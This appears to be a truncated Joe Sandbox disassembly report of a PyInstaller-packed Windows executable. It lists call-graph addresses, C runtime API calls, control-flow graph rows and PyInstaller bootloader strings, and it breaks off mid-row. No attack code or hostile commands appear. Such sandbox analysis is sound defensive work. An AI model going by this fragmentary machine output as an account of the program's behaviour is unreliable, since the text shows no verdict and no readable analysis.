56152 7ff6900125f0 53 API calls _log10_special 56063->56152 56064 7ff690015cf0 56067 7ff690015cff 56064->56067 56068 7ff690015d10 56064->56068 56066 7ff690015cce 56066->55910 56153 7ff6900125f0 53 API calls _log10_special 56067->56153 56130 7ff690014700 56068->56130 56071 7ff690015d2b 56072 7ff690015d2f 56071->56072 56073 7ff690015d40 56071->56073 56154 7ff6900125f0 53 API calls _log10_special 56072->56154 56075 7ff690015d4f 56073->56075 56076 7ff690015d60 56073->56076 56155 7ff6900125f0 53 API calls _log10_special 56075->56155 56137 7ff6900145a0 56076->56137 56080 7ff690015d6f 56156 7ff6900125f0 53 API calls _log10_special 56080->56156 56081 7ff690015d80 56083 7ff690015d8f 56081->56083 56084 7ff690015da0 56081->56084 56157 7ff6900125f0 53 API calls _log10_special 56083->56157 56086 7ff690015db1 56084->56086 56088 7ff690015dc2 56084->56088 56158 7ff6900125f0 53 API calls _log10_special 56086->56158 56091 7ff690015dec 56088->56091 56159 7ff6900265c0 73 API calls 56088->56159 56090 7ff690015dda 56160 7ff6900265c0 73 API calls 56090->56160 56091->56066 56161 7ff6900125f0 53 API calls _log10_special 56091->56161 56095 7ff690015820 56094->56095 56095->56095 56096 7ff690015849 56095->56096 56102 7ff690015860 __std_exception_destroy 56095->56102 56189 7ff6900125f0 53 API calls _log10_special 56096->56189 56098 7ff690015855 56098->55912 56099 7ff69001596b 56099->55912 56101 7ff6900125f0 53 API calls 56101->56102 56102->56099 56102->56101 56165 7ff690011440 56102->56165 56103->55914 56105 7ff690013f1a 56104->56105 56106 7ff6900186b0 2 API calls 56105->56106 56107 7ff690013f3f 56106->56107 56108 7ff69001b870 _log10_special 8 API calls 56107->56108 56109 7ff690013f67 56108->56109 56109->56039 56110 7ff6900181a0 56109->56110 56111 7ff6900186b0 2 API calls 56110->56111 56112 7ff6900181b4 LoadLibraryExW 56111->56112 56113 7ff6900181d3 __std_exception_destroy 56112->56113 56113->56039 56114->56047 56115->56033 56116->56047 56117->56047 56118->56047 56121 7ff690014cac 56119->56121 56120 7ff690014cb4 56120->56057 56121->56120 56124 7ff690014e54 56121->56124 56162 7ff690025db4 48 API calls 56121->56162 56122 7ff690015017 __std_exception_destroy 56122->56057 56123 7ff690014180 47 API calls 56123->56124 56124->56122 56124->56123 56127 7ff690014480 56126->56127 56128 7ff69001b870 _log10_special 8 API calls 56127->56128 56129 7ff6900144ea 56128->56129 56129->56063 56129->56064 56131 7ff69001476f 56130->56131 56135 7ff69001471b 56130->56135 56164 7ff690014300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56131->56164 56133 7ff69001477c 56133->56071 56136 7ff69001475a 56135->56136 56163 7ff690014300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56135->56163 56136->56071 56138 7ff6900145b5 56137->56138 56139 7ff690011bf0 49 API calls 56138->56139 56140 7ff690014601 56139->56140 56141 7ff690011bf0 49 API calls 56140->56141 56150 7ff690014687 __std_exception_destroy 56140->56150 56143 7ff690014640 56141->56143 56142 7ff69001b870 _log10_special 8 API calls 56144 7ff6900146dc 56142->56144 56145 7ff6900186b0 2 API calls 56143->56145 56143->56150 56144->56080 56144->56081 56146 7ff69001465a 56145->56146 56147 7ff6900186b0 2 API calls 56146->56147 56148 7ff690014671 56147->56148 56149 7ff6900186b0 2 API calls 56148->56149 56149->56150 56150->56142 56151->56066 56152->56066 56153->56066 56154->56066 56155->56066 56156->56066 56157->56066 56158->56066 56159->56090 56160->56091 56161->56066 56162->56121 56163->56136 56164->56133 56166 7ff690013f70 108 API calls 56165->56166 56167 7ff690011463 56166->56167 56168 7ff69001146b 56167->56168 56169 7ff69001148c 56167->56169 56208 7ff6900125f0 53 API calls _log10_special 56168->56208 56171 7ff69001f9f4 73 API calls 56169->56171 56173 7ff6900114a1 56171->56173 56172 7ff69001147b 56172->56102 56174 7ff6900114c1 56173->56174 56175 7ff6900114a5 56173->56175 56177 7ff6900114f1 56174->56177 56178 7ff6900114d1 56174->56178 56209 7ff690012760 53 API calls 2 library calls 56175->56209 56181 7ff6900114f7 56177->56181 56185 7ff69001150a 56177->56185 56210 7ff690012760 53 API calls 2 library calls 56178->56210 56180 7ff69001f36c 74 API calls 56182 7ff690011584 56180->56182 56190 7ff6900111f0 56181->56190 56182->56102 56184 7ff69001f6bc _fread_nolock 53 API calls 56184->56185 56185->56184 56186 7ff690011596 56185->56186 56188 7ff6900114bc __std_exception_destroy 56185->56188 56211 7ff690012760 53 API calls 2 library calls 56186->56211 56188->56180 56189->56098 56191 7ff690011248 56190->56191 56192 7ff690011277 56191->56192 56193 7ff69001124f 56191->56193 56196 7ff6900112ad 56192->56196 56197 7ff690011291 56192->56197 56216 7ff6900125f0 53 API calls _log10_special 56193->56216 56195 7ff690011262 56195->56188 56199 7ff6900112bf 56196->56199 56206 7ff6900112db memcpy_s 56196->56206 56217 7ff690012760 53 API calls 2 library calls 56197->56217 56218 7ff690012760 53 API calls 2 library calls 56199->56218 56201 7ff69001f6bc _fread_nolock 53 API calls 56201->56206 56202 7ff6900112a8 __std_exception_destroy 56202->56188 56203 7ff69001139f 56219 7ff6900125f0 53 API calls _log10_special 56203->56219 56206->56201 56206->56202 56206->56203 56207 7ff69001f430 37 API calls 56206->56207 56212 7ff69001fdfc 56206->56212 56207->56206 56208->56172 56209->56188 56210->56188 56211->56188 56213 7ff69001fe2c 56212->56213 56220 7ff69001fb4c 56213->56220 56215 7ff69001fe4a 56215->56206 56216->56195 56217->56202 56218->56202 56219->56202 56221 7ff69001fb6c 56220->56221 56222 7ff69001fb99 56220->56222 56221->56222 56223 7ff69001fb76 56221->56223 56224 7ff69001fba1 56221->56224 56222->56215 56234 7ff690029b24 37 API calls 2 library calls 56223->56234 56227 7ff69001fa8c 56224->56227 56235 7ff69002477c EnterCriticalSection 56227->56235 56229 7ff69001faa9 56230 7ff69001facc 74 API calls 56229->56230 56231 7ff69001fab2 56230->56231 56232 7ff690024788 _fread_nolock LeaveCriticalSection 56231->56232 56233 7ff69001fabd 56232->56233 56233->56222 56234->56222 56236->55917 56239 7ff690023cfe 56237->56239 56238 7ff690023d23 56255 7ff690029b24 37 API calls 2 library calls 56238->56255 56239->56238 56241 7ff690023d5f 56239->56241 56256 7ff690021f30 49 API calls _invalid_parameter_noinfo 56241->56256 56243 7ff690023d4d 56244 7ff69001b870 _log10_special 8 API calls 56243->56244 56247 7ff690011c38 56244->56247 56245 7ff690029c58 __free_lconv_mon 11 API calls 56245->56243 56246 7ff690023df6 56248 7ff690023e3c 56246->56248 56249 7ff690023e11 56246->56249 56250 7ff690023e60 56246->56250 56253 7ff690023e08 56246->56253 56247->55734 56248->56245 56257 7ff690029c58 56249->56257 56250->56248 56251 7ff690023e6a 56250->56251 56254 7ff690029c58 __free_lconv_mon 11 API calls 56251->56254 56253->56248 56253->56249 56254->56243 56255->56243 56256->56246 56258 7ff690029c5d HeapFree 56257->56258 56262 7ff690029c8c 56257->56262 56259 7ff690029c78 GetLastError 56258->56259 56258->56262 56260 7ff690029c85 __free_lconv_mon 56259->56260 56263 7ff6900243f4 11 API calls _get_daylight 56260->56263 56262->56243 56263->56262 56265 7ff6900251d8 56264->56265 56266 7ff6900251fe 56265->56266 56269 7ff690025231 56265->56269 56295 7ff6900243f4 11 API calls _get_daylight 56266->56295 56268 7ff690025203 56296 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56268->56296 56271 7ff690025237 56269->56271 56272 7ff690025244 56269->56272 56297 7ff6900243f4 11 API calls _get_daylight 56271->56297 56283 7ff690029f38 56272->56283 56276 7ff690025258 56298 7ff6900243f4 11 API calls _get_daylight 56276->56298 56277 7ff690025265 56290 7ff69002f1dc 56277->56290 56280 7ff690025278 56299 7ff690024788 LeaveCriticalSection 56280->56299 56282 7ff690013fc6 56282->55933 56300 7ff69002f5e8 EnterCriticalSection 56283->56300 56285 7ff690029f4f 56286 7ff690029fac 19 API calls 56285->56286 56287 7ff690029f5a 56286->56287 56288 7ff69002f648 _isindst LeaveCriticalSection 56287->56288 56289 7ff69002524e 56288->56289 56289->56276 56289->56277 56301 7ff69002eed8 56290->56301 56293 7ff69002f236 56293->56280 56295->56268 56296->56282 56297->56282 56298->56282 56305 7ff69002ef13 __vcrt_InitializeCriticalSectionEx 56301->56305 56302 7ff69002f0da 56307 7ff69002f0e3 56302->56307 56319 7ff6900243f4 11 API calls _get_daylight 56302->56319 56304 7ff69002f1b1 56320 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56304->56320 56305->56302 56316 7ff690026d4c 51 API calls 3 library calls 56305->56316 56307->56293 56313 7ff690036064 56307->56313 56309 7ff69002f145 56309->56302 56317 7ff690026d4c 51 API calls 3 library calls 56309->56317 56311 7ff69002f164 56311->56302 56318 7ff690026d4c 51 API calls 3 library calls 56311->56318 56321 7ff690035664 56313->56321 56316->56309 56317->56311 56318->56302 56319->56304 56320->56307 56322 7ff690035699 56321->56322 56323 7ff69003567b 56321->56323 56322->56323 56325 7ff6900356b5 56322->56325 56375 7ff6900243f4 11 API calls _get_daylight 56323->56375 56332 7ff690035c74 56325->56332 56326 7ff690035680 56376 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56326->56376 56330 7ff69003568c 56330->56293 56378 7ff6900359a8 56332->56378 56335 7ff690035ce9 56409 7ff6900243d4 11 API calls _get_daylight 56335->56409 56336 7ff690035d01 56397 7ff690027830 56336->56397 56340 7ff690035cee 56410 7ff6900243f4 11 API calls _get_daylight 56340->56410 56368 7ff6900356e0 56368->56330 56377 7ff690027808 LeaveCriticalSection 56368->56377 56375->56326 56376->56330 56379 7ff6900359d4 56378->56379 56387 7ff6900359ee 56378->56387 56379->56387 56422 7ff6900243f4 11 API calls _get_daylight 56379->56422 56381 7ff6900359e3 56423 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56381->56423 56383 7ff690035abd 56394 7ff690035b1a 56383->56394 56428 7ff690028e90 37 API calls 2 library calls 56383->56428 56384 7ff690035a6c 56384->56383 56426 7ff6900243f4 11 API calls _get_daylight 56384->56426 56387->56384 56424 7ff6900243f4 11 API calls _get_daylight 56387->56424 56388 7ff690035b16 56388->56394 56395 7ff690029c10 _isindst 17 API calls 56388->56395 56389 7ff690035ab2 56427 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56389->56427 56392 7ff690035a61 56425 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56392->56425 56394->56335 56394->56336 56396 7ff690035bad 56395->56396 56429 7ff69002f5e8 EnterCriticalSection 56397->56429 56409->56340 56410->56368 56422->56381 56423->56387 56424->56392 56425->56384 56426->56389 56427->56383 56428->56388 56431 7ff690026c08 56430->56431 56434 7ff6900266e4 56431->56434 56433 7ff690026c21 56433->55943 56435 7ff6900266ff 56434->56435 56436 7ff69002672e 56434->56436 56445 7ff690029b24 37 API calls 2 library calls 56435->56445 56444 7ff69002477c EnterCriticalSection 56436->56444 56439 7ff69002671f 56439->56433 56440 7ff690026733 56441 7ff690026750 38 API calls 56440->56441 56442 7ff69002673f 56441->56442 56443 7ff690024788 _fread_nolock LeaveCriticalSection 56442->56443 56443->56439 56445->56439 56447 7ff69001f191 56446->56447 56448 7ff69001f163 56446->56448 56450 7ff69001f183 56447->56450 56456 7ff69002477c EnterCriticalSection 56447->56456 56457 7ff690029b24 37 API calls 2 library calls 56448->56457 56450->55947 56452 7ff69001f1a8 56453 7ff69001f1c4 72 API calls 56452->56453 56454 7ff69001f1b4 56453->56454 56455 7ff690024788 _fread_nolock LeaveCriticalSection 56454->56455 56455->56450 56457->56450 56458 7ff8b8316110 56459 7ff8b8316138 56458->56459 56460 7ff8b8316124 56458->56460 56512 7ff8b834a4a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 56459->56512 56462 7ff8b8316161 56460->56462 56471 7ff8b831626c 56460->56471 56463 7ff8b831616a 56462->56463 56464 7ff8b8316211 56462->56464 56466 7ff8b83161e9 56463->56466 56467 7ff8b831616f GetLastError 56463->56467 56505 7ff8b83176f0 56464->56505 56465 7ff8b83161d5 56466->56465 56472 7ff8b83161f9 56466->56472 56469 7ff8b831621a 56467->56469 56470 7ff8b8316186 56467->56470 56516 7ff8b83162cc 56469->56516 56513 7ff8b8313a40 6 API calls _set_errno_from_matherr 56470->56513 56471->56465 56540 7ff8b83177ec 117 API calls 56471->56540 56515 7ff8b8313a40 6 API calls _set_errno_from_matherr 56472->56515 56477 7ff8b831618b 56477->56469 56480 7ff8b8316197 56477->56480 56479 7ff8b83161fe 56479->56465 56485 7ff8b83162cc _set_errno_from_matherr 6 API calls 56479->56485 56481 7ff8b83162b7 SetLastError 56480->56481 56483 7ff8b83161a1 56480->56483 56481->56465 56483->56481 56486 7ff8b83161aa 56483->56486 56489 7ff8b83533ef 56485->56489 56514 7ff8b8313a40 6 API calls _set_errno_from_matherr 56486->56514 56487 7ff8b8316248 56492 7ff8b83162cc _set_errno_from_matherr 6 API calls 56487->56492 56488 7ff8b83162a9 56491 7ff8b83162cc _set_errno_from_matherr 6 API calls 56488->56491 56542 7ff8b831f930 29 API calls __free_lconv_num 56489->56542 56496 7ff8b83162b0 56491->56496 56497 7ff8b8316250 56492->56497 56494 7ff8b83161b5 SetLastError 56494->56465 56495 7ff8b83161d0 56494->56495 56495->56465 56541 7ff8b830f040 25 API calls 2 library calls 56496->56541 56498 7ff8b8316258 56497->56498 56499 7ff8b8353408 56497->56499 56538 7ff8b83163a4 25 API calls _set_errno_from_matherr 56498->56538 56502 7ff8b83162cc _set_errno_from_matherr 6 API calls 56499->56502 56502->56496 56503 7ff8b8316260 56539 7ff8b830f040 25 API calls 2 library calls 56503->56539 56543 7ff8b834967c 56505->56543 56507 7ff8b8317704 56509 7ff8b831773d 56507->56509 56551 7ff8b8316fd0 56507->56551 56510 7ff8b8317746 56509->56510 56587 7ff8b83496bc 8 API calls 3 library calls 56509->56587 56510->56465 56512->56460 56513->56477 56514->56494 56515->56479 56517 7ff8b831630c 56516->56517 56518 7ff8b8353475 TlsSetValue 56516->56518 56519 7ff8b8316223 56517->56519 56521 7ff8b831634b GetProcAddress 56517->56521 56524 7ff8b835344a 56517->56524 56628 7ff8b831bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56517->56628 56519->56481 56525 7ff8b830dcf0 56519->56525 56522 7ff8b8353455 56521->56522 56523 7ff8b8316367 56521->56523 56522->56518 56523->56518 56523->56519 56524->56521 56524->56522 56526 7ff8b830dd01 56525->56526 56527 7ff8b830dd16 HeapAlloc 56525->56527 56526->56527 56528 7ff8b8350f6e 56526->56528 56529 7ff8b830dd47 56527->56529 56532 7ff8b8350f80 56527->56532 56629 7ff8b8313440 25 API calls 2 library calls 56528->56629 56529->56487 56529->56488 56533 7ff8b8350fb9 56532->56533 56537 7ff8b8350f9f HeapAlloc 56532->56537 56630 7ff8b8303964 8 API calls _set_errno_from_matherr 56532->56630 56631 7ff8b836c860 10 API calls _set_errno_from_matherr 56532->56631 56632 7ff8b8313440 25 API calls 2 library calls 56533->56632 56536 7ff8b8350fc3 56537->56532 56537->56533 56538->56503 56539->56483 56540->56465 56541->56481 56542->56495 56544 7ff8b8349685 __vcrt_initialize_winapi_thunks 56543->56544 56588 7ff8b8349c98 56544->56588 56547 7ff8b8349698 56547->56507 56549 7ff8b83496a1 56549->56547 56595 7ff8b8349d04 DeleteCriticalSection 56549->56595 56612 7ff8b8317624 56551->56612 56554 7ff8b8317049 56554->56507 56555 7ff8b8316ff7 GetLastError 56556 7ff8b8317009 56555->56556 56557 7ff8b8317054 56555->56557 56621 7ff8b8313a40 6 API calls _set_errno_from_matherr 56556->56621 56558 7ff8b83162cc _set_errno_from_matherr 6 API calls 56557->56558 56560 7ff8b831705d 56558->56560 56562 7ff8b831708c SetLastError 56560->56562 56564 7ff8b830dcf0 _set_errno_from_matherr 25 API calls 56560->56564 56561 7ff8b831700e 56561->56557 56563 7ff8b831701a 56561->56563 56565 7ff8b8317094 56562->56565 56563->56562 56586 7ff8b8317020 56563->56586 56566 7ff8b8317070 56564->56566 56624 7ff8b836d140 6 API calls 56565->56624 56569 7ff8b831707e 56566->56569 56570 7ff8b831709f 56566->56570 56567 7ff8b8317025 56622 7ff8b8313a40 6 API calls _set_errno_from_matherr 56567->56622 56573 7ff8b83162cc _set_errno_from_matherr 6 API calls 56569->56573 56572 7ff8b83162cc _set_errno_from_matherr 6 API calls 56570->56572 56575 7ff8b83170a7 56572->56575 56576 7ff8b8317085 56573->56576 56574 7ff8b8317030 SetLastError 56574->56565 56577 7ff8b8317047 56574->56577 56578 7ff8b83170af 56575->56578 56579 7ff8b83534f3 56575->56579 56623 7ff8b830f040 25 API calls 2 library calls 56576->56623 56577->56554 56625 7ff8b83163a4 25 API calls _set_errno_from_matherr 56578->56625 56582 7ff8b83162cc _set_errno_from_matherr 6 API calls 56579->56582 56584 7ff8b8353500 56582->56584 56583 7ff8b83170b7 56626 7ff8b830f040 25 API calls 2 library calls 56583->56626 56586->56562 56586->56567 56587->56509 56589 7ff8b8349ca0 56588->56589 56591 7ff8b8349cd1 56589->56591 56593 7ff8b8349694 56589->56593 56596 7ff8b834a0a0 56589->56596 56601 7ff8b8349d04 DeleteCriticalSection 56591->56601 56593->56547 56594 7ff8b8349854 8 API calls 2 library calls 56593->56594 56594->56549 56595->56547 56602 7ff8b8349d88 56596->56602 56599 7ff8b834a0eb InitializeCriticalSectionAndSpinCount 56600 7ff8b834a0e0 56599->56600 56600->56589 56601->56593 56603 7ff8b8349de9 56602->56603 56610 7ff8b8349de4 try_get_function 56602->56610 56603->56599 56603->56600 56604 7ff8b8349ecc 56604->56603 56606 7ff8b8349eda GetProcAddress 56604->56606 56605 7ff8b8349e18 LoadLibraryExW 56607 7ff8b8349e39 GetLastError 56605->56607 56605->56610 56608 7ff8b8349eeb 56606->56608 56607->56610 56608->56603 56609 7ff8b8349eb1 FreeLibrary 56609->56610 56610->56603 56610->56604 56610->56605 56610->56609 56611 7ff8b8349e73 LoadLibraryExW 56610->56611 56611->56610 56613 7ff8b83176df TlsAlloc 56612->56613 56616 7ff8b831765d 56612->56616 56614 7ff8b8316fe6 56613->56614 56614->56554 56614->56555 56616->56614 56617 7ff8b8317695 GetProcAddress 56616->56617 56620 7ff8b835361c 56616->56620 56627 7ff8b831bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56616->56627 56618 7ff8b83176b1 56617->56618 56619 7ff8b8353627 56617->56619 56618->56613 56618->56614 56619->56613 56620->56617 56620->56619 56621->56561 56622->56574 56623->56562 56624->56554 56625->56583 56626->56586 56627->56616 56628->56517 56629->56529 56630->56532 56631->56532 56632->56536 56633 7ff690012d00 56634 7ff690012d10 56633->56634 56635 7ff690012d4b 56634->56635 56636 7ff690012d61 56634->56636 56661 7ff6900125f0 53 API calls _log10_special 56635->56661 56638 7ff690012d81 56636->56638 56647 7ff690012d97 __std_exception_destroy 56636->56647 56662 7ff6900125f0 53 API calls _log10_special 56638->56662 56640 7ff69001b870 _log10_special 8 API calls 56642 7ff690012f1a 56640->56642 56641 7ff690012d57 __std_exception_destroy 56641->56640 56643 7ff690011440 116 API calls 56643->56647 56644 7ff690013069 56669 7ff6900125f0 53 API calls _log10_special 56644->56669 56645 7ff690011bf0 49 API calls 56645->56647 56647->56641 56647->56643 56647->56644 56647->56645 56648 7ff690013053 56647->56648 56650 7ff69001302d 56647->56650 56652 7ff690012f27 56647->56652 56668 7ff6900125f0 53 API calls _log10_special 56648->56668 56667 7ff6900125f0 53 API calls _log10_special 56650->56667 56653 7ff690012f93 56652->56653 56663 7ff690029714 37 API calls 2 library calls 56652->56663 56655 7ff690012fbe 56653->56655 56656 7ff690012fb0 56653->56656 56665 7ff690012af0 37 API calls 56655->56665 56664 7ff690029714 37 API calls 2 library calls 56656->56664 56659 7ff690012fbc 56666 7ff690012470 54 API calls __std_exception_destroy 56659->56666 56661->56641 56662->56641 56663->56653 56664->56659 56665->56659 56666->56641 56667->56641 56668->56641 56669->56641 56670 7ff69001ae00 56671 7ff69001ae2e 56670->56671 56672 7ff69001ae15 56670->56672 56672->56671 56675 7ff69002c90c 56672->56675 56676 7ff69002c957 56675->56676 56680 7ff69002c91b _get_daylight 56675->56680 56683 7ff6900243f4 11 API calls _get_daylight 56676->56683 56678 7ff69002c93e HeapAlloc 56679 7ff69001ae8e 56678->56679 56678->56680 56680->56676 56680->56678 56682 7ff6900328a0 EnterCriticalSection LeaveCriticalSection _get_daylight 56680->56682 56682->56680 56683->56679

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 7ff690011000-7ff690013536 call 7ff69001f138 call 7ff69001f140 call 7ff69001bb70 call 7ff690024700 call 7ff690024794 call 7ff6900133e0 14 7ff690013538-7ff69001353f 0->14 15 7ff690013544-7ff690013566 call 7ff6900118f0 0->15 16 7ff69001371a-7ff690013735 call 7ff69001b870 14->16 21 7ff690013736-7ff69001374c call 7ff690013f70 15->21 22 7ff69001356c-7ff690013583 call 7ff690011bf0 15->22 27 7ff69001374e-7ff69001377b call 7ff6900176a0 21->27 28 7ff690013785-7ff69001379a call 7ff6900125f0 21->28 26 7ff690013588-7ff6900135c1 22->26 29 7ff6900135c7-7ff6900135cb 26->29 30 7ff690013653-7ff69001366d call 7ff690017e10 26->30 41 7ff69001377d-7ff690013780 call 7ff69001f36c 27->41 42 7ff69001379f-7ff6900137be call 7ff690011bf0 27->42 44 7ff690013712 28->44 33 7ff690013638-7ff69001364d call 7ff6900118e0 29->33 34 7ff6900135cd-7ff6900135e5 call 7ff690024560 29->34 46 7ff69001366f-7ff690013675 30->46 47 7ff690013695-7ff69001369c 30->47 33->29 33->30 49 7ff6900135e7-7ff6900135eb 34->49 50 7ff6900135f2-7ff69001360a call 7ff690024560 34->50 41->28 61 7ff6900137c1-7ff6900137ca 42->61 44->16 51 7ff690013677-7ff690013680 46->51 52 7ff690013682-7ff690013690 call 7ff69002415c 46->52 53 7ff6900136a2-7ff6900136c0 call 7ff690017e10 call 7ff690017f80 47->53 54 7ff690013844-7ff690013863 call 7ff690013e90 47->54 49->50 66 7ff690013617-7ff69001362f call 7ff690024560 50->66 67 7ff69001360c-7ff690013610 50->67 51->52 52->47 78 7ff6900136c6-7ff6900136c9 53->78 79 7ff69001380f-7ff69001381e call 7ff690018400 53->79 69 7ff690013871-7ff690013882 call 7ff690011bf0 54->69 70 7ff690013865-7ff69001386f call 7ff690013fe0 54->70 61->61 65 7ff6900137cc-7ff6900137e9 call 7ff6900118f0 61->65 65->26 82 7ff6900137ef-7ff690013800 call 7ff6900125f0 65->82 66->33 83 7ff690013631 66->83 67->66 81 7ff690013887-7ff6900138a1 call 7ff6900186b0 69->81 70->81 78->79 84 7ff6900136cf-7ff6900136f6 call 7ff690011bf0 78->84 95 7ff69001382c-7ff690013836 call 7ff690017c40 79->95 96 7ff690013820 79->96 91 7ff6900138af-7ff6900138c1 SetDllDirectoryW 81->91 92 7ff6900138a3 81->92 82->44 83->33 100 7ff6900136fc-7ff690013703 call 7ff6900125f0 84->100 101 7ff690013805-7ff69001380d call 7ff69002415c 84->101 98 7ff6900138d0-7ff6900138ec call 7ff690016560 call 7ff690016b00 91->98 99 7ff6900138c3-7ff6900138ca 91->99 92->91 95->81 109 7ff690013838 95->109 96->95 118 7ff690013947-7ff69001394a call 7ff690016510 98->118 119 7ff6900138ee-7ff6900138f4 98->119 99->98 103 7ff690013a50-7ff690013a58 99->103 112 7ff690013708-7ff69001370a 100->112 101->81 107 7ff690013a5a-7ff690013a77 PostMessageW GetMessageW 103->107 108 7ff690013a7d-7ff690013a92 call 7ff6900133d0 call 7ff690013080 call 7ff6900133a0 103->108 107->108 129 7ff690013a97-7ff690013aaf call 7ff690016780 call 7ff690016510 108->129 109->54 112->44 127 7ff69001394f-7ff690013956 118->127 121 7ff6900138f6-7ff690013903 call 7ff6900165a0 119->121 122 7ff69001390e-7ff690013918 call 7ff690016970 119->122 121->122 135 7ff690013905-7ff69001390c 121->135 132 7ff69001391a-7ff690013921 122->132 133 7ff690013923-7ff690013931 call 7ff690016cd0 122->133 127->103 131 7ff69001395c-7ff690013966 call 7ff6900130e0 127->131 131->112 141 7ff69001396c-7ff690013980 call 7ff6900183e0 131->141 138 7ff69001393a-7ff690013942 call 7ff690012870 call 7ff690016780 132->138 133->127 146 7ff690013933 133->146 135->138 138->118 151 7ff690013982-7ff69001399f PostMessageW GetMessageW 141->151 152 7ff6900139a5-7ff6900139e8 call 7ff690017f20 call 7ff690017fc0 call 7ff690016780 call 7ff690016510 call 7ff690017ec0 141->152 146->138 151->152 163 7ff6900139ea-7ff690013a00 call 7ff6900181f0 call 7ff690017ec0 152->163 164 7ff690013a3d-7ff690013a4b call 7ff6900118a0 152->164 163->164 171 7ff690013a02-7ff690013a10 163->171 164->112 172 7ff690013a31-7ff690013a38 call 7ff690012870 171->172 173 7ff690013a12-7ff690013a2c call 7ff6900125f0 call 7ff6900118a0 171->173 172->164 173->112
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                                                  • Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                                                                                                  • Instruction ID: 474b030fdf745ab564fdf7fb3f6c5f80cb3659e2ab9b4b01cf09ef63c0e4f6ba
                                                                                                                                                                  • Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                                                                                                  • Instruction Fuzzy Hash: 75F17C21A0CA82B1EBB9DB31D5542F96661EF44788F8440B2EA5DC33DEEF2CE559D300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 245 7ff690034f10-7ff690034f4b call 7ff690034898 call 7ff6900348a0 call 7ff690034908 252 7ff690034f51-7ff690034f5c call 7ff6900348a8 245->252 253 7ff690035175-7ff6900351c1 call 7ff690029c10 call 7ff690034898 call 7ff6900348a0 call 7ff690034908 245->253 252->253 259 7ff690034f62-7ff690034f6c 252->259 279 7ff6900351c7-7ff6900351d2 call 7ff6900348a8 253->279 280 7ff6900352ff-7ff69003536d call 7ff690029c10 call 7ff690030888 253->280 261 7ff690034f8e-7ff690034f92 259->261 262 7ff690034f6e-7ff690034f71 259->262 265 7ff690034f95-7ff690034f9d 261->265 264 7ff690034f74-7ff690034f7f 262->264 267 7ff690034f8a-7ff690034f8c 264->267 268 7ff690034f81-7ff690034f88 264->268 265->265 269 7ff690034f9f-7ff690034fb2 call 7ff69002c90c 265->269 267->261 271 7ff690034fbb-7ff690034fc9 267->271 268->264 268->267 275 7ff690034fca-7ff690034fd6 call 7ff690029c58 269->275 276 7ff690034fb4-7ff690034fb6 call 7ff690029c58 269->276 285 7ff690034fdd-7ff690034fe5 275->285 276->271 279->280 288 7ff6900351d8-7ff6900351e3 call 7ff6900348d8 279->288 299 7ff69003537b-7ff69003537e 280->299 300 7ff69003536f-7ff690035376 280->300 285->285 289 7ff690034fe7-7ff690034ff8 call 7ff69002f784 285->289 288->280 297 7ff6900351e9-7ff69003520c call 7ff690029c58 GetTimeZoneInformation 288->297 289->253 298 7ff690034ffe-7ff690035054 call 7ff6900397e0 * 4 call 7ff690034e2c 289->298 311 7ff6900352d4-7ff6900352fe call 7ff690034890 call 7ff690034880 call 7ff690034888 297->311 312 7ff690035212-7ff690035233 297->312 358 7ff690035056-7ff69003505a 298->358 304 7ff690035380 299->304 305 7ff6900353b5-7ff6900353c8 call 7ff69002c90c 299->305 303 7ff69003540b-7ff69003540e 300->303 309 7ff690035414-7ff69003541c call 7ff690034f10 303->309 310 7ff690035383 303->310 304->310 320 7ff6900353ca 305->320 321 7ff6900353d3-7ff6900353ee call 7ff690030888 305->321 316 7ff690035388-7ff6900353b4 call 7ff690029c58 call 7ff69001b870 309->316 310->316 317 7ff690035383 call 7ff69003518c 310->317 318 